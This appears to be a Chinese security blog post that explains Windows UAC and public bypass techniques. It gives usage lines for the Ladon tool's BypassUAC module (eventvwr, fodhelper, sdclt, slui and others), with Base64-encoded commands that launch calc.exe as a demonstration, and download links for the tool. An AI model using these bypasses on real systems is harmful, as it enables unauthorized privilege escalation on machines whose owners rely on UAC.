什么是UAC
根据MSDN中的文档,User Account Control(UAC)是在Windows Vista 以后版本中引入的一种安全机制,针对具有有限权限的账户.
通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。
BypassUAC方法
目前公开的绕过UAC的几种方式:
1.各类的UAC白名单程序的DLL劫持
2.各类自动提升权限的COM接口利用(Elevated COM interface)
3.Windows 自身漏洞提权
4.远程注入
UACME: https://github.com/hfiref0x/UACME,内含60+种BypassUAC的方法,有兴趣可自行研究
利用白名单
如果进程本身具有管理员权限或者可以直接获取管理员权限的话,就不会弹出UAC框让用户确认,这类程序被称为白名单程序,例如:slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe,rundll32.exe,explorer.exe等等。
Ladon 8.0
[+] BypassUac 五种方法UAC提权(非交互式执行Base64加密CMD命令)
用法Ladon BypassUac
eventvwr
fodhelper
computerdefaults
sdclt
slui
[+] BypassUac2 eventvwr方法执行明文cmd命令(即8.0前的bypassUAC)
Ladon用法
Load BypassUAC
Usage:
Method: eventvwr, fodhelper,computerdefaults, sdclt, slui
Default Bypass Method is eventvwr
Ladon BypassUAC Method Base64Cmd
Example:
Ladon BypassUAC eventvwr Y2FsYw==
Base64Cmd: 使用Ladon8.0 GUI版EnCode模块里的Base64Encode加密
Example
Example usage for eventvwr bypass to launch calc.exe
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for fodhelper bypass to launch calc.exe
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for computerdefaults bypass to launch calc.exe
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for sdclt bypass to launch calc.exe
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Note: this appears to only work on Windows 10 in my testing
Example usage for slui bypass to launch calc.exe
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for DiskCleanup bypass to launch calc.exe
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
Ladon下载
LadonGo3.4: https://github.com/k8gege/LadonGo
PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
Ladon 7.0版本:http://k8gege.org/Download
Ladon 8.0版本:K8小密圈
![〖EXP〗Drupal远程代码执行漏洞复现&Ladon批量利用[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)